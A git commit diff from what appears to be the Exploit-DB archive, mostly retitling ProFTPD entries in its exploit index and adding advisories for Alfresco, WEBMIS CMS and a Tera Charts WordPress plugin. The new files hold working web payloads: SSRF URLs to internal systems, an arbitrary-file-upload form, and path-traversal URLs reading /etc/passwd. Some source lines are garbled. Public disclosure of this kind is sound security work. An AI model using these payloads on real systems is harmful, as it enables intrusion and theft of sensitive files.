DB: 2016-01-19
10 new exploits
This commit is contained in:
parent
7f341adc84
commit
93d901f3b2
14 changed files with 709 additions and 43 deletions
46
files.csv
46
files.csv
|
@ -41,7 +41,7 @@ id,file,description,date,author,platform,type,port
|
|||
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,N/A,linux,local,0
|
||||
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
|
||||
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
|
||||
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
|
||||
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0
|
||||
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80
|
||||
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25
|
||||
|
@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
|
|||
104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0
|
||||
105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308
|
||||
106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0
|
||||
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
|
||||
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
|
||||
109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135
|
||||
110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
|
||||
111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
|
||||
|
@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port
|
|||
391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548
|
||||
392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401
|
||||
393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - Local pr_ctrls_connect Vulnerability (ftpdctl)",2004-08-13,pi3,linux,local,0
|
||||
395,platforms/windows/local/395.c,"AOL Instant Messenger AIM _Away_ Message Local Exploit",2004-08-14,mandragore,windows,local,0
|
||||
396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0
|
||||
397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143
|
||||
|
@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port
|
|||
2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0
|
||||
2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
|
||||
2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0
|
||||
2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0
|
||||
2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0
|
||||
|
@ -2602,7 +2602,7 @@ id,file,description,date,author,platform,type,port
|
|||
2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0
|
||||
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0
|
||||
2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
|
||||
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0
|
||||
2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0
|
||||
2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include Vulnerability",2006-12-14,ex0,php,webapps,0
|
||||
|
@ -2997,7 +2997,7 @@ id,file,description,date,author,platform,type,port
|
|||
3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 (album) Remote SQL Injection Vulnerability",2007-02-17,Bl0od3r,php,webapps,0
|
||||
3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0
|
||||
3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit",2007-02-18,Revenge,linux,local,0
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0
|
||||
3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0
|
||||
3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0
|
||||
3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0
|
||||
|
@ -3957,7 +3957,7 @@ id,file,description,date,author,platform,type,port
|
|||
4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0
|
||||
4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0
|
||||
4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
|
||||
4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0
|
||||
4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
|
||||
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389
|
||||
|
@ -7565,7 +7565,7 @@ id,file,description,date,author,platform,type,port
|
|||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
|
||||
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0
|
||||
8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
|
||||
8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
|
||||
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0
|
||||
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0
|
||||
8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0
|
||||
|
@ -9414,7 +9414,7 @@ id,file,description,date,author,platform,type,port
|
|||
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
|
||||
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
|
||||
10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion Vulnerability",2009-10-12,NoGe,php,webapps,0
|
||||
10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0
|
||||
10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80
|
||||
|
@ -13439,7 +13439,7 @@ id,file,description,date,author,platform,type,port
|
|||
15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0
|
||||
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
|
||||
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
|
||||
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
|
||||
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
|
||||
|
@ -13960,7 +13960,7 @@ id,file,description,date,author,platform,type,port
|
|||
16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0
|
||||
16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0
|
||||
16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
|
||||
16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0
|
||||
16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0
|
||||
16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
|
||||
|
@ -14653,7 +14653,7 @@ id,file,description,date,author,platform,type,port
|
|||
16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - _secure_ Overflow (Linux)",2010-09-20,metasploit,linux,remote,0
|
||||
16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0
|
||||
16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
|
||||
16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
|
||||
16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String Vulnerability",2010-04-30,metasploit,linux,remote,0
|
||||
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,metasploit,hardware,remote,0
|
||||
|
@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port
|
|||
16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0
|
||||
16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0
|
||||
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0
|
||||
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
|
||||
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
|
||||
16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
|
||||
16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0
|
||||
16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0
|
||||
|
@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port
|
|||
17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0
|
||||
17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
|
||||
17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0
|
||||
17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
|
||||
17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
|
||||
17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0
|
||||
17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
|
||||
17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0
|
||||
|
@ -16869,7 +16869,7 @@ id,file,description,date,author,platform,type,port
|
|||
19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0
|
||||
19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0
|
||||
19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto RodrÃguez Aragonés",windows,local,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0
|
||||
19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0
|
||||
19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0
|
||||
|
@ -17858,7 +17858,7 @@ id,file,description,date,author,platform,type,port
|
|||
20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
|
||||
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
|
||||
20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
|
||||
20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
|
||||
20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
|
||||
20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0
|
||||
|
@ -19339,7 +19339,7 @@ id,file,description,date,author,platform,type,port
|
|||
22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0
|
||||
22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0
|
||||
22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0
|
||||
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
|
||||
22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow Vulnerability",2002-12-10,"Joel Soderberg",windows,remote,0
|
||||
|
@ -20397,7 +20397,7 @@ id,file,description,date,author,platform,type,port
|
|||
23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service Vulnerability",1998-12-12,marchew,irix,dos,0
|
||||
23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation Vulnerability",2003-09-22,"Sebastian Krahmer",linux,local,0
|
||||
23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 Login Remote Denial of Service Vulnerability",2003-09-23,"Moran Zavdi",windows,dos,0
|
||||
23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
|
||||
23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
|
||||
23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0
|
||||
23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 SQL-GW Connection Denial of Service Vulnerability",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0
|
||||
23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure Vulnerability",2003-09-24,"Phuong Nguyen",multiple,remote,0
|
||||
|
@ -35500,3 +35500,13 @@ id,file,description,date,author,platform,type,port
|
|||
39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
|
||||
39255,platforms/php/webapps/39255.html,"WEBMIS CMS Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
|
||||
39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39258,platforms/multiple/remote/39258.txt,"Alfresco /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39259,platforms/multiple/remote/39259.txt,"Alfresco /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
|
||||
39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/multiple/remote/39258.txt
Executable file
9
platforms/multiple/remote/39258.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
|
||||
|
||||
Alfresco Community Edition is prone to multiple security vulnerabilities.
|
||||
|
||||
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
|
||||
|
||||
Alfresco Community Edition 4.2.f and earlier are vulnerable.
|
||||
|
||||
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port
|
9
platforms/multiple/remote/39259.txt
Executable file
9
platforms/multiple/remote/39259.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
|
||||
|
||||
Alfresco Community Edition is prone to multiple security vulnerabilities.
|
||||
|
||||
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
|
||||
|
||||
Alfresco Community Edition 4.2.f and earlier are vulnerable.
|
||||
|
||||
http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port
|
16
platforms/php/webapps/39255.html
Executable file
16
platforms/php/webapps/39255.html
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/68658/info
|
||||
|
||||
WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files.
|
||||
|
||||
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
||||
|
||||
<form
|
||||
action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php"
|
||||
method="post"
|
||||
enctype="multipart/form-data">
|
||||
<label for="file">Filename:</label>
|
||||
<input type="file" name="Filedata" ><br>
|
||||
<input type=text name="path" value="/webmis_installation/plugin/">
|
||||
<input type=text name="someKey" value="someValue"]>
|
||||
<input type="submit" name="submit" value="Submit">
|
||||
</form>
|
10
platforms/php/webapps/39256.txt
Executable file
10
platforms/php/webapps/39256.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/68662/info
|
||||
|
||||
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
|
||||
|
||||
Tera Charts 0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
|
||||
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
|
9
platforms/php/webapps/39257.txt
Executable file
9
platforms/php/webapps/39257.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68662/info
|
||||
|
||||
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
|
||||
|
||||
Tera Charts 0.1 is vulnerable; other versions may also be affected.
|
||||
